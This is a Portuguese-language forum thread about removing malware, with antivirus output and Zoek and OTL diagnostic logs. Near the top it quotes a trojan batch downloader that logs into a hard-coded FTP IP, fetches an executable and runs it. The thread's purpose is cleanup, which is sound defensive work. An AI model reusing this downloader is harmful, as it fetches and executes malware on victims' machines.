[Resolvido] Script malicioso

C:\Windows\System32\cmd.txt: File infected with text/DownBat.A
Delete file: C:\Windows\System32\cmd.txt
Cleaning successful

@echo off
@echo off>x
mode con: COLS=15 lines=10>x
@echo open 222.186.30.65>x
@echo 123>>x
@echo 123>>x
@echo get 4.exe c:\4.exe>>x
@echo bye>>X
@ftp -s:x
start C:\4.exe>>x

gvl disse:

Olá,Wings

Já tinha visto este arquivo em outras pastas no micro, e entradas no registro. Esta dficou para trás. Mandei remover.

C:\Windows\pss\360.bat

Zoek.exe Version 4.0.0.2 Updated 03-June-2013
Tool run by xxxxxxxx on 11/06/2013 at 10:01:09,30.
Microsoft Windows 7 Professional 6.1.7600 x86
Running in: Normal Mode Internet Access Detected

==== Registry Fix Code ======================

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Micros oft^Windows^Start Menu^Programs^Startup^360.bat]

==== Deleting Files \ Folders ======================

"C:\Windows\pss\360.bat" not found

==== EOF on 11/06/2013 at 10:01:42,28 ======================

Zoek.exe Version 4.0.0.2 Updated 03-June-2013
Tool run by xxxxxxxx on 11/06/2013 at 10:04:55,10.
Microsoft Windows 7 Professional 6.1.7600 x86
Running in: Normal Mode Internet Access Detected

==== Running Processes ======================

C:\Windows\System32\smss.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\wininit.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\winlogon.exe
C:\Windows\system32\LogonUI.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe
C:\Program Files\FileZilla Server\FileZilla Server.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamscheduler.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
C:\Program Files\Microsoft SQL Server\MSAS10_50.MSSQLSERVER\OLAP\bin\msmdsrv.exe
C:\Program Files\Microsoft SQL Server\MSRS10_50.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe
C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE
C:\Windows\system32\conhost.exe
C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\squid\sbin\squid.exe
C:\Program Files\TightVNC\tvnserver.exe
c:\squid\libexec\unlinkd.exe
C:\Windows\system32\conhost.exe
C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe
C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\fdhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\winlogon.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
C:\Windows\system32\rdpclip.exe
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskhost.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\notepad.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe
C:\Program Files\TightVNC\tvnserver.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Unlocker\UnlockerAssistant.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files\Common Files\Java\Java Update\jucheck.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\winlogon.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
C:\Windows\system32\rdpclip.exe
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskhost.exe
C:\Windows\Explorer.EXE
C:\Program Files\FileZilla Server\FileZilla Server Interface.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe
C:\Program Files\TightVNC\tvnserver.exe
C:\Program Files\Unlocker\UnlockerAssistant.exe
C:\Users\Public\TMP\WinCe.exe
C:\Windows\system32\taskhost.exe
C:\Users\xxxxxxxx\Desktop\zoek.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalServicePeerNet

==== System Specs ======================

Windows: Windows XP Professional Service Pack 2 (Build 2600)
Memory (RAM): 3063 MB
CPU Info: Intel(R) Pentium(R) CPU G6950 @ 2.80GHz
CPU Speed: 2800,4 MHz
Sound Card: Áudio Remoto |
Display Adapters: RDPDD Chained DD | RDP Encoder Mirror Driver | RDP Reflector Display Driver
Monitors: 1x;
Screen Resolution: 1152 X 864 - 32 bit
Network: Network Present
Network Adapters: Controlador Ethernet genérico baseado no Marvell Yukon 88E8053
CD / DVD Drives: 1x (D: | ) D: HL-DT-STDVD-ROM DH40N
Ports: COM1 | COM2 LPT Port NOT Present.
Mouse: 3 Button Wheel Mouse Present
Hard Disks: C: 232,6GB
Hard Disks - Free: C: 195,7GB
Manufacturer *: Dell Inc.
BIOS Info: AT/AT COMPATIBLE | 10/18/10 | DELL - 1
Time Zone: Hora oficial do Brasil
Motherboard *: Dell Inc. 07GPTK
Internet Explorer Version: 8.0.7600.16385
Sun Java version: 1.7.0_15
Country: Brasil
Language: PTB

==== Files Recently Created / Modified ======================

====== C:\Windows ====
====== C:\Users\SERVID~1\AppData\Local\Temp ====
====== C:\Windows\system32 =====
2013-06-08 10:53:26 D0AAAE16BA162DD89D646887F1539855 1700352 ----a-w- C:\Windows\System32\gdiplus.dll
2013-06-08 10:53:26 CA2F560921B7B8BE1CF555A5A18D54C3 348160 ----a-w- C:\Windows\System32\msvcr71.dll
2013-06-08 10:53:26 1FD3F9722119BDF7B8CFF0ECD1E84EA6 1060864 ----a-w- C:\Windows\System32\mfc71.dll
====== C:\Windows\system32\drivers =====
====== C:\Windows\Tasks ======
====== C:\Windows\Temp ======
======= C:\Program Files =====
2013-05-25 14:06:00 -------- d-----w- C:\Program Files\InstallJammer Registry
2013-05-25 14:05:56 -------- d-----w- C:\Program Files\Programas RFB
2013-05-23 17:31:54 -------- d-----w- C:\Program Files\Programas_SPED
2013-05-23 17:31:53 -------- d--h--w- C:\Program Files\Zero G Registry
======= C: =====
2013-06-11 12:26:57 565A245B6C76FB4DD67453A41AAB106E 13030 ----a-w- C:\PDOXUSRS.NET
====== C:\Users\xxxxxxxx\AppData\Roaming ======
2013-06-11 09:59:01 -------- d-----w- C:\users\xxxxxxxx\AppData\Local\Temp
2013-06-11 00:41:05 -------- d-----w- C:\users\xxxxxxxx\AppData\Local\Norman Malware Cleaner
2013-06-10 13:22:41 -------- d-----w- C:\users\xxxxxxxx\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker
====== C:\Users\xxxxxxxx ======
2013-06-11 09:58:40 -------- d-----w- C:\Users\Todos os Usußrios\Kaspersky Lab
2013-06-10 21:12:56 0F2483E389C4C09A6E1D6686C5EC16E2 704 --sha-r- C:\ProgramData\ntuser.pol
2013-06-10 21:06:38 -------- d-----r- C:\Users\Public\Videos
2013-06-10 21:06:38 -------- d-----r- C:\Users\Public\Pictures
2013-06-08 10:55:13 -------- d-s---w- C:\ProgramData\Shared Space
2013-06-03 10:25:15 -------- d-----w- C:\Users\Public\Music
2013-06-01 07:15:12 -------- d-----w- C:\ProgramData\KingSoft
2013-05-25 14:11:42 -------- d-----w- C:\Users\xxxxxxxx\.receitanet
2013-05-25 13:43:05 -------- d-----w- C:\Users\xxxxxxxx\sped
2013-05-23 17:33:59 -------- d-----w- C:\Users\xxxxxxxx\.spedfiscal
2013-05-23 17:19:17 -------- d--h--w- C:\Users\xxxxxxxx\InstallAnywhere

====== C: exe-files ==
2013-06-10 13:28:24 BE66ACEACC6A6222D661CD475FBA30B2 881715 ----a-w- C:\Program Files\Glary Utilities\unins000.exe
2013-06-10 13:28:24 62E9330776C0C38315DCDC7560DA338C 62240 ----a-w- C:\Program Files\Glary Utilities\upgrade.exe
2013-06-10 13:26:29 016D85DC34357BBE7447411C63D0B731 6696960 ----a-w- C:\xxxx\Glary_Utilities_v2.56.0.1822.exe
2013-06-10 13:22:41 CBC4DC3DC6588687641D7FFD626A0156 98302 ----a-w- C:\Program Files\Unlocker\uninst.exe
2013-06-08 09:54:19 9EF10EE66812F24B9BCB14DE5991F4FC 130846192 ----a-w- C:\xxxx\cfw_installer.exe
=== C: other files ==
2013-06-07 16:45:49 129FE37998819A0D07E9B2B83C450BDE 4621 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx MARCO 2013\NFE.ZIP
2013-06-07 16:45:47 F032505E3EAD6BD1C54CAECBBFEE6CFF 5430 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx MARCO 2013\2-40167070.zip
2013-06-07 16:45:47 22CA9E793492593577895EB4D5C1468A 4677 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx MAIO 2013\NFE.ZIP
2013-06-07 16:45:46 9EDC0D6786F0B5A6F71ED4BBE0879CA9 5198 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx FEVEREIRO 2013\NFE.ZIP
2013-06-07 16:45:46 2E529F48FB5237B1D12E4D40B95EA398 4774 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx JANEIRO 2013\NFE.ZIP
2013-06-07 16:45:45 D7CFDF74E7319ECDFCE7F1F77AFEB07A 4665 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx ABRIL 2013\NFE.ZIP
2013-06-07 16:45:11 28707CECAC38042741C2BFAAE2AE46D9 4735 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx MARCO 2013\NFE.ZIP
2013-06-07 16:45:10 FA36EF9B70D021365A71374D96865EF5 4764 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx FEVEREIRO 2013\NFE.ZIP

==== Startup Registry Enabled ======================

[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"

[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"

[HKEY_USERS\S-1-5-21-3320972484-280281306-3388420964-1019\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"

[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"mctadmin"="C:\Windows\System32\mctadmin.exe"

[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"mctadmin"="C:\Windows\System32\mctadmin.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FileZilla Server Interface"="C:\Program Files\FileZilla Server\FileZilla Server Interface.exe"
"Adobe ARM"="C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
"GrooveMonitor"="C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
"AVP"="C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe"
"tvncontrol"="C:\Program Files\TightVNC\tvnserver.exe -controlservice -slave"
"SunJavaUpdateSched"="C:\Program Files\Common Files\Java\Java Update\jusched.exe"
"UnlockerAssistant"="C:\Program Files\Unlocker\UnlockerAssistant.exe"

==== Startup Registry Disabled ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\cao]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="cao"
"hkey"="HKLM"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\gbrspcontrol]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="gbrspcontrol"
"hkey"="HKLM"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PrinterShare]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="PrinterShare"
"hkey"="HKCU"


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^360.bat]
"backup"="C:\\Windows\\pss\\360.bat.CommonStartup"
"backupExtension"=".CommonStartup"
"item"="360"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Start GeekBuddy.lnk]
"backupExtension"=".CommonStartup"
"item"="Start GeekBuddy"


==== Task Scheduler Jobs ======================

C:\Windows\tasks\Adobe Flash Player Updater.job --a------ C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [07/06/2013 09:08]
C:\Windows\tasks\GlaryInitialize.job --a------ C:\Program Files\Glary Utilities\initialize.exe [27/05/2013 16:51]

==== Firefox Extensions ======================

==== Firefox Plugins ======================

Profilepath: C:\Users\xxxxxxxx\AppData\Roaming\Mozilla\Firefox\Profiles\uorss01j.default
AFD9010DC500096809C2784551909304 - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll - Java(TM) Platform SE 7 U15
1B197A0ED28DB310AB67591567C3787A - C:\Windows\system32\npdeployJava1.dll - Java Deployment Toolkit 7.0.150.3
6F120933F87E7DEC972476170288A267 - C:\Program Files\Adobe\Reader 10.0\Reader\browser\nppdf32.dll - Adobe Acrobat
0BD343C45B4ECCF8D6AF94D6C3ADC310 - C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll - Adobe Acrobat
15E298B5EC5B89C5994A59863969D9FF - C:\Windows\system32\npmproxy.dll - Microsoft® Windows® Operating System


==== Chrome Look ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
dchlnpcodkpfdpacogkljefecpegganj - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\ChromeExt\urladvisor.crx[18/08/2012 14:06]
hghkgaeecgjhjkannahfamoehjmkjail - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\ChromeExt\content_blocker_chrome.crx[18/08/2012 14:06]
jagncdcchgajhfhijbbhecadmaiegcmh - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\ChromeExt\virtkbd.crx[22/04/2013 04:58]

==== IE Start and Search Settings ======================

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.google.com"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC"
{6A1806CD-94D4-4689-BA73-E35EA1EA9990} Google Url="http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}"

==== HijackThis Entries ======================

O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: ContentBlockerBrowserHelperObject - {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
O2 - BHO: VirtualKeyboardBrowserHelperObject - {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll
O2 - BHO: link filter bho - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\UrlAdvisor\klwtbbho.dll
O3 - Toolbar: (no name) - {D4027C7F-154A-4066-A1AD-4243D8127440} - (no file)
O4 - HKLM\..\Run: [FileZilla Server Interface] "C:\Program Files\FileZilla Server\FileZilla Server Interface.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [AVP] "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe"
O4 - HKLM\..\Run: [tvncontrol] "C:\Program Files\TightVNC\tvnserver.exe" -controlservice -slave
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [UnlockerAssistant] "C:\Program Files\Unlocker\UnlockerAssistant.exe"
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'SERVIÇO LOCAL')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'SERVIÇO LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'SERVIÇO DE REDE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'SERVIÇO DE REDE')
O4 - HKUS\S-1-5-21-3320972484-280281306-3388420964-1019\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'Dataminas')
O9 - Extra button: Teclado Virtual - {0C4CC089-D306-440D-9772-464E226F6539} - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
O9 - Extra button: Enviar para o OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: &Enviar para o OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\Office12\REFIEBAR.DLL
O9 - Extra button: Verificação de URLs - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\UrlAdvisor\klwtbbho.dll
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - http://download.eset.com/special/eos/OnlineScanner.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{488832D2-5BFC-4748-8C6B-0C4E6DF9246B}: NameServer = 186.250.135.1
O17 - HKLM\System\CCS\Services\Tcpip\..\{5D1ACB20-0BF5-4778-A377-E3997409E27D}: NameServer = 186.250.135.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{488832D2-5BFC-4748-8C6B-0C4E6DF9246B}: NameServer = 186.250.135.1
O17 - HKLM\System\CS2\Services\Tcpip\..\{488832D2-5BFC-4748-8C6B-0C4E6DF9246B}: NameServer = 186.250.135.1
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MICROS~4\Office12\GRA32A~1.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Serviço do Kaspersky Anti-Virus (AVP) - Kaspersky Lab ZAO - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe
O23 - Service: FileZilla Server FTP server (FileZilla Server) - FileZilla Project - C:\Program Files\FileZilla Server\FileZilla Server.exe
O23 - Service: MBAMScheduler - Malwarebytes Corporation - C:\Program Files\Malwarebytes' Anti-Malware\mbamscheduler.exe
O23 - Service: MBAMService - Malwarebytes Corporation - C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: SquidNT - SQUID Web Proxy Cache - http://www.squid-cache.org/ - C:\squid\sbin\squid.exe
O23 - Service: TightVNC Server (tvnserver) - GlavSoft LLC. - C:\Program Files\TightVNC\tvnserver.exe

==== EOF on 11/06/2013 at 10:08:22,98 ======================

OTL logfile created on: 11/06/2013 10:31:39 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\xxxxxxxx\Desktop
Professional (Version = 6.1.7600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.7600.16385)
Locale: 00000416 | Country: Brasil | Language: PTB | Date Format: dd/MM/yyyy

2,99 Gb Total Physical Memory | 1,19 Gb Available Physical Memory | 39,93% Memory free
5,98 Gb Paging File | 3,98 Gb Available in Paging File | 66,57% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 232,63 Gb Total Space | 195,65 Gb Free Space | 84,10% Space Free | Partition Type: NTFS

Computer Name: xxxxxxxx | User Name: xxxxxxxx | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: Off | File Age = 30 Days

========== Custom Scans ==========

< HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder /s >
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^360.bat]
"backup" = C:\Windows\pss\360.bat.CommonStartup
"location" = C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup -- [2013/06/10 07:33:30 | 000,000,000 | R--D | M]
"backupExtension" = .CommonStartup
"item" = 360
"YEAR" = 2012
"MONTH" = 11
"DAY" = 13
"HOUR" = 14
"MINUTE" = 49
"SECOND" = 28
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Start GeekBuddy.lnk]
"location" = C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup -- [2013/06/10 07:33:30 | 000,000,000 | R--D | M]
"backupExtension" = .CommonStartup
"item" = Start GeekBuddy
"YEAR" = 2013
"MONTH" = 6
"DAY" = 10
"HOUR" = 7
"MINUTE" = 33
"SECOND" = 30

< End of report >

gvl disse:

Olá, Wings,


Ok, procedimento efetuado. Só não apareceu nenhuma tela com relatório, fica salvo em algum local ?

========== REGISTRY ==========
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^360.bat\ deleted successfully.
========== COMMANDS ==========

OTL by OldTimer - Version 3.2.69.0 log created on 06112013_112239